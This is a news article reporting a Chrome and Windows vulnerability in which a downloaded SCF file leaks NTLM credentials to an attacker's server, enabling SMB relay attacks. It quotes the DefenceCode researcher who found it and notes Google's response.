A Google Chrome vulnerability allows hackers to steal people's Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts. The attack technique that can allow credential theft is a combination of two different techniques, one of which was borrowed from the Stuxnet campaign and the other from a technique demonstrated at a Black Hat conference by two security researchers.
The Google Chrome vulnerability was uncovered by DefenceCode security engineer Bosko Stankovic, who said in a blog that he found the flaw in a default configuration of Chrome running on Windows 10.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim's authentication credentials," Stankovic said.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations since it "it enables the attacker to impersonate members of the organisation". Hackers can also "immediately reuse" stolen credentials and privileges gained to launch further attacks "on other users or gain access and control of IT resources".
DefenceCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and "taking necessary action."
According to Stankovic, the attack is simple and involves victims being tricked into clicking on a malicious link, which triggers an automatic download a Windows Explorer Shell Command File or SCF file. The SCF file lies dormant until the victim opens the download directory folder, after which it attempts to exfiltrate data linked with a Windows icon located on the hacker's server. This in turn provides the attacker with the victim's username and hashed password.
Threatpost cited independent security researchers as having noted that this flaw is not exclusively tied to how Chrome deals SCF files, rather it also relates to how Windows handles SCF files.
"Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password," Stankovic warned.